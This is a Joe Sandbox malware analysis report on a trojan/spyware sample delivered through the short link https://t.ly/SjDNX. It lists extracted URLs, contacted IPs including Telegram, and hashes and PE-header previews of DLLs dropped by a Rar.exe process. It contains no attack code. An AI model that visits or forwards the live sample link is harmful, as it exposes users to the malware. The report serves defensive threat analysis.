                                                                                                                                                                            http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallestsynaptics.exe, 00000023.00000003.2039743862.0000000002010000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2045181510.0000000002011000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.00000000020E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.python.org/dev/peps/pep-0205/synaptics.exe, 00000023.00000003.1958064050.0000000002165000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2499258870.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://tools.ietf.org/html/rfc8017#section-8.1.1synaptics.exe, 00000023.00000003.2252883950.00000000045FC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2443636300.00000000021D6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2319593829.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2261980733.00000000021CF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325645647.00000000023A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://www.drm-x.com/pdfversion.htm1.5.7.0..http://www.haihaisoft.com/PDF_Reader_download.aspxopenSoA vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://twitter.com/synaptics.exe, 00000023.00000003.2101481574.0000000002104000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2456483780.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081093217.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2083225319.0000000001F78000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2086898648.0000000002111000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://tools.ietf.org/html/rfc8017#section-8.1.2synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2252883950.00000000045FC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004970000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      142.250.186.78
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      1.1.1.1
                                                                                                                                                                                      unknownAustralia
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      184.28.88.176
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      16625AKAMAI-ASUSfalse
                                                                                                                                                                                      142.250.185.227
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      104.20.6.133
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      216.58.206.46
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      162.159.61.3
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      2.23.197.184
                                                                                                                                                                                      unknownEuropean Union
                                                                                                                                                                                      1273CWVodafoneGroupPLCEUfalse
                                                                                                                                                                                      208.95.112.1
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      53334TUT-ASUSfalse
                                                                                                                                                                                      149.154.167.220
                                                                                                                                                                                      unknownUnited Kingdom
                                                                                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                      unknownReserved
                                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                                      54.144.73.197
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      14618AMAZON-AESUSfalse
                                                                                                                                                                                      185.166.143.48
                                                                                                                                                                                      unknownGermany
                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                      142.250.185.195
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      3.232.60.224
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      14618AMAZON-AESUSfalse
                                                                                                                                                                                      142.250.186.100
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      185.166.143.50
                                                                                                                                                                                      unknownGermany
                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                      199.232.210.172
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                      66.102.1.84
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      IP
                                                                                                                                                                                      192.168.2.16
                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                      Analysis ID:1554449
                                                                                                                                                                                      Start date and time:2024-11-12 15:05:23 +01:00
                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 7m 8s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                      Sample URL:https://t.ly/SjDNX
                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                      Number of analysed new started processes analysed:36
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal88.troj.spyw.win@70/1671@0/20
                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, CompPkgSrv.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                      • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                      • VT rate limit hit for: https://t.ly/SjDNX
                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                      09:07:02API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                                                                                                                                                      InputOutput
                                                                                                                                                                                      URL: Model: claude-3-5-sonnet-latest
                                                                                                                                                                                      {
                                                                                                                                                                                          "typosquatting": false,
                                                                                                                                                                                          "unusual_query_string": false,
                                                                                                                                                                                          "suspicious_tld": true,
                                                                                                                                                                                          "ip_in_url": false,
                                                                                                                                                                                          "long_subdomain": false,
                                                                                                                                                                                          "malicious_keywords": false,
                                                                                                                                                                                          "encoded_characters": false,
                                                                                                                                                                                          "redirection": true,
                                                                                                                                                                                          "contains_email_address": false,
                                                                                                                                                                                          "known_domain": false,
                                                                                                                                                                                          "brand_spoofing_attempt": false,
                                                                                                                                                                                          "third_party_hosting": true
                                                                                                                                                                                      }
                                                                                                                                                                                      URL: https://t.ly
                                                                                                                                                                                      No context
                                                                                                                                                                                      No context
                                                                                                                                                                                      No context
                                                                                                                                                                                      No context
                                                                                                                                                                                      No context
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):56600
                                                                                                                                                                                      Entropy (8bit):6.701238830377098
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:FDUfUUn5KdYveu2H7sz9YHIRTRILOnY7SyOPx3A:FDgDn0KPz9YHIxRILOnYIx3A
                                                                                                                                                                                      MD5:252C9B6FCC220FE16499ABF4A8E2A2E8
                                                                                                                                                                                      SHA1:03327874A1153E9FE640E6F5E8D987CCC84034C4
                                                                                                                                                                                      SHA-256:E01FDB89380EBF58700F40DCEBAFCB37F24970C8EA1F33063BDEA873B53E720D
                                                                                                                                                                                      SHA-512:F68C9D043D5EF7A32098DDD9C1622F761F88DA31CA47450AB1D95E51AB8CD06E1658DC57DB150AAF51B682F7F285654E6BBD118B3CA8400BB5B2D461BDC78926
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:...T..T..T....T...U..T...Q..T...P..T...W..T.m.U..T..U..T..U.+.T.m.\..T.m.T..T.m....T.m.V..T.Rich..T.........................PE..L...9.,d...........!.....R...\.......V.......p......................................B.....@.............................P......d......................../..........(...T...............................@............p...............................text...TP.......R.................. ..`.rdata...7...p...8...V..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):72472
                                                                                                                                                                                      Entropy (8bit):6.8432832170573255
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:QxDhX4Vb2zMIsTRGxT+0q8i9qK5ILCVwQ7Sy8Pxer:mhi2zvsCK0ti9qK5ILCVwQ6xw
                                                                                                                                                                                      MD5:5C952E57426E429F6F4CEC9FEB841815
                                                                                                                                                                                      SHA1:83BFD2108E188909C7FF3B294AB9C99336D02D06
                                                                                                                                                                                      SHA-256:B682E9E8152036BDEBF4CA5410D3C0F88FA3272A969830F63C7B61BB1F0DA89F
                                                                                                                                                                                      SHA-512:2B6AB5F24E7E232C8906AC12C5A4994CFCF1B061FFC25407F278DE3D97664716C24E58237EE6EC48949AC6C1F4522AA1CA4C5238015D128E3A9BE602D2CE0ED2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j.:...i...i...i.svi...i.~.h...i.d.i...i.~.h...i.~.h...i.~.h...i.~.h...i.s.h...i...i...i.~.h...i.~.h...i.~.i...i.~.h...iRich...i........PE..L...Y.,d...........!.........D.............................................. ......!.....@.............................H................................/.......... ...T...........................x...@...............8............................text............................... ..`.rdata...-..........................@..@.data...8...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):108312
                                                                                                                                                                                      Entropy (8bit):6.644234290397436
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:qS6mSAe9tVW/dhyGfnH/Jt5Phld/7VILLPf17Mxk:qS6mzInWlhyiH/Jt1d/7wJ
                                                                                                                                                                                      MD5:FF0992DFB0D4D90BDCEAAD68246C5C22
                                                                                                                                                                                      SHA1:3508B7D730DDE3DB94AE413625451AE8CAA0BD7D
                                                                                                                                                                                      SHA-256:F879F86BF65CE05EE3467DF65C55B9837F9DFFB0F024C350C9A9869A08609759
                                                                                                                                                                                      SHA-512:8BEBC01958D71B327CBC39ED04BC53F6484CAA0232A1FD71E6691BDAA89FCBC766BC888D45870DC24D1190C48A0AE0A58C447EC936E34DB23059EE6F35A138BB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.....................H..............................................Y........&................$..........Rich...........................PE..L...W.,d...........!................................................................)]....@.........................P4.......4.......p...............x.../.........../..T............................/..@............................................text...!........................... ..`.rdata..TK.......L..................@..@.data...l....P.......:..............@....rsrc........p.......V..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):195864
                                                                                                                                                                                      Entropy (8bit):6.894532348319941
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:HJwcAu1LgDNsFyrbz5arkp1Lq00rBCXN4hmuqaxgU3pJMWlXgWcW+33SgRILOqXv:HNAg8rRaULECXN4Quqax33XMW5gJW+34
                                                                                                                                                                                      MD5:FBE8BB3048DF17FF9DDB0972825FDA71
                                                                                                                                                                                      SHA1:E3AD65446B60554CB9F7C45700BE2EAD1453772F
                                                                                                                                                                                      SHA-256:283AA604D532B6239AA8D8794C8D8A4F3A11C93DFBCEF846315CFD74F5E07E2F
                                                                                                                                                                                      SHA-512:48C66F10F9E79359DF63FD381C21B4559438DAE7AD84C625EFE1C7AB802F31BB8D326650F654C8EA504791595D801679A6F156F7ED90DA98AEBC04D2120C90A6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m<.c)].0)].0)].0 %"0'].0{(.1+].0{(.1%].0{(.1#].0{(.1-].0.(.1*].0b%.1+].0)].0.].0.(.1&].0.(.1(].0.(N0(].0.(.1(].0Rich)].0................PE..L...E.,d...........!................(........ ......................................R.....@.............................P...`............................/......t.......T...............................@............ ..d............................text............................... ..`.rdata....... ......................@..@.data...x...........................@....rsrc...............................@..@.reloc..t...........................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):114968
                                                                                                                                                                                      Entropy (8bit):6.774198419515606
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:Z+6/1DqY6SFc720NRIF2Upji0101tgJIL6fijC8u8xF:Tw9uWy01tgW+g
                                                                                                                                                                                      MD5:9CBEE02CC8FB2DA7C05B9D6EB5FC38A2
                                                                                                                                                                                      SHA1:1D0F75F30BDF542E6A275DCA0192C70AE3B2F455
                                                                                                                                                                                      SHA-256:AFB9950D0B16254025F3C2DE68C877381D3DA57FEFDB02504C21EE8D4C2E84E5
                                                                                                                                                                                      SHA-512:99841EA990FE5874F3B4975318AC81D144D22CE6A6C245A001B67F33BE3A6D41901B18387F9A1564CAD3544F077812D0AE78D8880C66E79FBFDB1DD50117D2A0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y..7...7...7.......7..6...7..2...7..3...7..4...7.\.6...7..6...7...6.:.7.\.?...7.\.7...7.\....7.\.5...7.Rich..7.........................PE..L...A.,d...........!.........t.......!.......0............................................@.........................Pf..X....f..x......................../...........a..T............................b..@............0..P............................text...l........................... ..`.rdata..ZE...0...F... ..............@..@.data................f..............@....rsrc................p..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):49432
                                                                                                                                                                                      Entropy (8bit):6.749500211425154
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:H+OYENKnr4deUNXT1Ee20RILOIS5YiSyvWPxWEa1E:HbYENsr4MWT1Ee20RILOIQ7SyOPxl
                                                                                                                                                                                      MD5:2AC2DEE9FDB32BE30FEFD4FDB5D280B3
                                                                                                                                                                                      SHA1:5E803C5D649521CAB34BFC7EF6DC44954915220D
                                                                                                                                                                                      SHA-256:F10C90062EAA68F41B1A6B34F3796E3AB8E0D765E595236E893CFF9FAD30116A
                                                                                                                                                                                      SHA-512:86A7DFE6F15FCE67ACCBC84262C73D25F2E440B7529143235B9B32F15F7804F99206E24C5ED8E5219BB5895BF6E397304BA153E064FF97EED23F5E92469E901E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.&...H...H...H.......H._.I...H._.M...H._.L...H._.K...H...I...H.F.I...H...I...H...I.H...@...H...H...H......H...J...H.Rich..H.........PE..L...q.,d...........!.....>...T.......C.......P.......................................+....@..........................w..P....w.........................../..........(s..T............................s..@............P...............................text...t=.......>.................. ..`.rdata..j4...P...6...B..............@..@.data...h............x..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):148248
                                                                                                                                                                                      Entropy (8bit):7.03034519275223
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:VcSEmJbTMWUCFHRQWtwjEYZLlFrFvIB+hBJQ8T374Tu2d//zHf39mNoBJNWQ5ILt:GwUC9RQWtwjEGgYXT3CTvYOVWQI
                                                                                                                                                                                      MD5:6174470C775AD7529891E1BA3C54F87B
                                                                                                                                                                                      SHA1:A1536BDECFD42F99BD1CC561EC727D81F613D205
                                                                                                                                                                                      SHA-256:E1E346F8B9FA43EC5519166D92625168EBB642A70F52611545117631C74181BD
                                                                                                                                                                                      SHA-512:0595EA1C8D2784D1C8272E29D8E9C1C074FFA1CA14116AE7E65C52DA1D1E87A0AE1FD9D3EF285F887A8847008DA1EBE3E1F6ACF1294AFDC9E2F31216F7AB7CB4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*.P.D.P.D.P.D.Y...T.D...E.R.D...A.[.D...@.Z.D...G.S.D...E.S.D...E.R.D.P.E.1.D...L.j.D...D.Q.D.....Q.D...F.Q.D.RichP.D.........PE..L.....,d...........!.....f..........<k.......................................@.......C....@.............................L.......x.... .................../...0..t.......T...........................H...@...............x............................text...[e.......f.................. ..`.rdata..b............j..............@..@.data...H...........................@....rsrc........ ......................@..@.reloc..t....0......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37656
                                                                                                                                                                                      Entropy (8bit):6.790398784644929
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:uW9a35lnOP/xoUAIpd+o7uMnm9YVp5Dsa5ILCGaY35YiSyvJPxWEas6:T9a35lOPJmmVp5Dh5ILCGz7SyBPxA
                                                                                                                                                                                      MD5:87A21CFE0CB3953D5D1442042A72C602
                                                                                                                                                                                      SHA1:2E33DCF83DAA1642CBE38BBD1CABC15072DCDC1C
                                                                                                                                                                                      SHA-256:8DF955D1CA6519173E34785FB9F38D1D52F4EDBA4F0E0742749F13AEF19A8F34
                                                                                                                                                                                      SHA-512:01222931EA798F6783EE6F665FE2E3B911BA7818651DD89E7EB0F1EC8EBCB4912361593E6FA24427DE6A74C5F53AE9A99F291A8F85A985DFCD10546FAB6B3B03
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j.{...(...(...(.s[(...(.~.)...(.~.)...(.~.)...(.~.)...(.~.)...(.s.)...(...(...(.~.)...(.~.)...(.~7(...(.~.)...(Rich...(................PE..L...F.,d...........!.....(...<.......-.......@.......................................<....@.........................PW..H....W.......................d.../...........R..T...........................8S..@............@...............................text...j'.......(.................. ..`.rdata...!...@..."...,..............@..@.data........p.......N..............@....rsrc................T..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):29976
                                                                                                                                                                                      Entropy (8bit):6.798507676792536
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:aQJATEdgw8HYcj4HjzjuRTBax6i+5/ZMILWBLCHQIYiSy1pCQHcPxh8E9VF0NyUC:9kHYDs88HFZMILWtY5YiSyv8PxWEaC
                                                                                                                                                                                      MD5:7AB685D3F467C7029DEE1A943BB19065
                                                                                                                                                                                      SHA1:BCADE206E6863874EAF72A1CAA748FBDEE916970
                                                                                                                                                                                      SHA-256:91889BBF6DFADFC026276141A4260D7F2C19090FDE9EE04490B9211DD3933EBA
                                                                                                                                                                                      SHA-512:D8E8CABA0D030FA0433D71D376608ACA2DA003D76C67FE9AB8C7B7E4A6AA7E0C21454E1D45CD052BB67B681B57094BDFA9CD634C1A1AE22C104568D20D13B02A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ Nb.A 1.A 1.A 1.9.1.A 1.4!0.A 1.4%0.A 1.4$0.A 1.4#0.A 1i4!0.A 1.A!1.A 1.9!0.A 1i4(0.A 1i4 0.A 1i4.1.A 1i4"0.A 1Rich.A 1........PE..L...D.,d...........!.........,...............0......................................./....@.........................P<..`....<..x....`...............F.../...p.......7..T............................8..@............0..H............................text...t........................... ..`.rdata.......0......................@..@.data...`....P.......4..............@....rsrc........`.......8..............@..@.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):42264
                                                                                                                                                                                      Entropy (8bit):6.794037552069512
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:Hv9eDBCwgCnLEggqKboqjzezQPxNILXtV05YiSyvdPxWEaoC:FwgULj8NvezQPxNILXtVe7SylPxRC
                                                                                                                                                                                      MD5:0A4AAABED72E8E08143EB129E5E24407
                                                                                                                                                                                      SHA1:A85094E29FE1DE755DFB2BB2650378CA7BD1F5F2
                                                                                                                                                                                      SHA-256:2233C561A18D92ADC2F4C56D6C55ADFB4A01049E801BDD3BB2A03CEE125F6E43
                                                                                                                                                                                      SHA-512:79942D76D23376C71028EED8658E2C938DFE64D54D56FC60C0CA8F2FCA9515D7A5A24A5ABFDCB51DFF944ED2F7BEB17B6D5BA50D45A62DE9A7DB4FDCF6A04F62
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P..f...f...f......f...g...f...c...f...b...f...e...f...g...f...g...f...g...f...b...f...n...f...f...f.......f...d...f.Rich..f.................PE..L...H.,d...........!.....8...>......]<.......P......................................{.....@..........................h..X...(i.......................v.../......$...8d..T............................d..@............P...............................text...$6.......8.................. ..`.rdata...#...P...$...<..............@..@.data................`..............@....rsrc................d..............@..@.reloc..$............n..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28440
                                                                                                                                                                                      Entropy (8bit):6.828727954203399
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:gtbUDut6rf1vYvVILQUG5YiSyvhPxWEa4:uUa8f1vYvVILQU87SyJPxp
                                                                                                                                                                                      MD5:2E6FE907E37F3F9154DB187C1B7F8232
                                                                                                                                                                                      SHA1:77F25B5D95097DFDA0F9FD58632F8711091547CD
                                                                                                                                                                                      SHA-256:763D333C80F4C11861C9210C4BD53FEDA24B5598AC9270391B2EC250BD52B636
                                                                                                                                                                                      SHA-512:D87683A681D576CB334BDF2CE385E6BDB115D18232E160F17535A6BA432342604ADE6404F085F64ECA63C639860968603D4D8DB11A11520A1BC44B2A57FE00AF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p..p..p....p...q..p...u..p...t..p...s..p.m.q..p..q..p..q...p.m.x..p.m.p..p.m....p.m.r..p.Rich..p.................PE..L...H.,d...........!.........*...............0............................................@..........................<..L....=..d....`...............@.../...p..\...`8..T............................8..@............0...............................text............................... ..`.rdata.......0......................@..@.data...@....P.......0..............@....rsrc........`.......2..............@..@.reloc..\....p.......<..............@..B................................................................................................................................................................................................................................................................................................
